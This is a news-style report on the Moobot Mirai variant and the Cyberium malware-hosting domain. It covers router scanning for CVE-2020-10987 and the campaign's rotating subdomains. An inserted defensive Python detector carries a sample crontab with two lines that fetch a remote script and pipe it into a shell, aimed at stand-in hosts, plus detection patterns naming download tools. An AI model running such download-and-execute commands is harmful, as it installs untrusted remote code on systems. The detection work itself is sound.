A variant of the Mirai botnet called Moobot saw a big rise in activity recently, with researchers picking up widespread scanning in their telemetry for a known vulnerability in Tenda routers.
The scanning was traced back to a malware-hosting domain new to researchers, known as Cyberium, which has been serving a large volume of Mirai-variant payloads. Analysis of the campaign revealed Cyberium to be an active Mirai-variant malware hosting site.
According to AT&T Alien Labs, the scanning for vulnerable Tenda routers caught researchers' attention because scanning for that particular bug is rare. The targeted flaw is a remote code-execution (RCE) vulnerability, CVE-2020-10987.
“This spike was observed throughout a significant number of clients, in the space of a few hours,” according to an AT&T analysis, released Monday. “This vulnerability is not commonly used by web scanners and was barely detected by our honeypots during the last six months, except for a minor peak in November.”
Following the breadcrumbs of the activity, researchers tracked down the infrastructure behind the Tenda scans in late March, and discovered that it was also being used to scan for additional bugs: in the Axis SSI, in Huawei home routers (CVE-2017-17215) and in the Realtek SDK Miniigd (CVE-2014-8361).
It was also deploying a DVR scanner that tried default credentials for the Sofia video application. These compromise efforts were tied to a variety of different Mirai-based botnet infections, including the Satori botnet.
Across all of this activity, the malware dropped on compromised devices was fetched from the same hosting domain: dns.cyberium[.]cc.
“When this domain was investigated, several campaigns were identified, going back at least one year to May 2020,” according to AT&T. “Most of the attacks lasted for approximately a week while they hosted several Mirai variants.”
Each campaign had its own subdomain under the Cyberium domain, and once the campaign was over, the subdomain stopped resolving. While a campaign was active, it would cycle between different Mirai variants: the same URL could be hosting Satori one day and Moobot the week after, according to AT&T.
“The actors appear to come back to the same domain with a new subdomain for each new campaign,” researchers explained.
“Activity in between campaigns goes quiet to increase the trust of the original domain. Keeping a long-running existing domain while issuing a brand-new subdomain helps to divert attention to the new domain and thus distract from the original.”
After initial compromise of a targeted internet of things (IoT) device, the first request to Cyberium was for a bash script that acted as a downloader.
“The script attempts to download a list of filenames (associated with different CPU architectures), executes each one of them, achieves persistence through a crontab that redownloads the bash script itself and finally deletes itself,” according to the analysis.
This script is very similar to downloaders previously seen for Mirai variants, researchers noted.
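The persistence step described above leaves a recognisable trace: a crontab entry that fetches a shell script from a remote host and immediately runs it. The following is an added example of how a defender might hunt for that pattern on a Linux or IoT host; it is not code from the AT&T report and is not the attacker's downloader. The crontab content, the IP address and the hostname are constructed sample data, and the fetch tools and shell names it looks for are assumptions about what such a cron line typically contains.

```python
import re

# Constructed sample crontab (illustrative only; not taken from the report).
# Two of these entries fetch a remote .sh and pipe it straight into a shell,
# which is the persistence shape the downloader leaves behind.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * wget -q http://203.0.113.10/bins/update.sh -O - | sh
@reboot curl -s http://dl.example.invalid/x/dl.sh | bash
30 3 * * 0 /opt/backup/run.sh
"""

# Assumed set of download tools commonly found on embedded Linux.
FETCH_TOOLS = ("wget", "curl", "tftp", "ftpget")
# Output piped into a shell (sh, ash, dash, bash) ...
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|da|a)?sh\b")
# ... or a shell run on a .sh file within the same command line.
RUN_SH_FILE = re.compile(r"(?:^|[;&|]\s*)(?:ba)?sh\s+\S+\.sh\b")
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s'\"|;&]+")


def parse_crontab(text):
    """Return (schedule, command) pairs; skips comments, blanks and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        if line.startswith("@"):              # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:                                 # five time fields, then the command
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue                      # malformed line, nothing to run
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append((schedule, command.strip()))
    return entries


def is_remote_fetch_exec(command):
    """True if the command downloads something and hands it to a shell."""
    tokens = command.split()
    fetches = any(tok.rsplit("/", 1)[-1] in FETCH_TOOLS for tok in tokens)
    if not fetches:
        return False
    return bool(PIPE_TO_SHELL.search(command) or RUN_SH_FILE.search(command))


def find_suspicious(text):
    """Flag crontab entries matching the fetch-and-execute persistence pattern."""
    findings = []
    for schedule, command in parse_crontab(text):
        if is_remote_fetch_exec(command):
            findings.append({
                "schedule": schedule,
                "command": command,
                "urls": URL_RE.findall(command),   # hosts worth blocking / pivoting on
            })
    return findings


if __name__ == "__main__":
    # On a real host, feed in the output of `crontab -l` or the files under /etc/cron*.
    for f in find_suspicious(SAMPLE_CRONTAB):
        print(f"{f['schedule']:<12} {f['urls']}  <- {f['command']}")
```

A match on a minute-by-minute or `@reboot` schedule that pulls a script and pipes it into `sh` is the signal to look for; the extracted URLs give the hosting domain to block and to pivot on in DNS logs, which is exactly how the Cyberium subdomains were tied together.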
Moobot was first spotted in April 2020, using a pair of zero-day exploits to compromise multiple types of fibre routers. Then last October, it was seen going after vulnerable Docker APIs. In all cases, the goal is to add devices as nodes in a botnet used to carry out distributed denial-of-service (DDoS) attacks, just like Mirai itself. It is not one of the more common variants, however.
One of Moobot's main distinguishing features is a hardcoded string that is used several times throughout the code, including to generate the process name used during execution, according to AT&T.
“The number of samples Alien Labs has seen with that string has greatly increased in the last months, scattering from the original Moobot sample,” AT&T noted. “This could potentially mean that last year’s Moobots samples were used to create new branches of Mirai variants.”
In a new wrinkle, the observed Moobot samples were encrypted.
“However, it did maintain other previously seen characteristics, like a hardcoded list of IP addresses to avoid, such as: private ranges, the Department of Defence, IANA IPs, GE, HP and others,” according to the analysis.
AT&T found that Cyberium has been operating for roughly a year and appears to remain active. At the time of publication, some of the Cyberium subdomains were still up but not hosting any malware samples, potentially indicating that the pages are waiting to serve new command-and-control (C2) server lists, according to AT&T.
The researchers said that the cyber-criminals behind Cyberium remain somewhat mysterious.
“Several questions remain unanswered,” researchers concluded. “Why would the attackers deliver different Mirai variants with different C2s on the same campaign? Are they trying to avoid anti-virus detection through diversification of variants? Or are they trying to improve the botnet resiliency by diversifying C2?”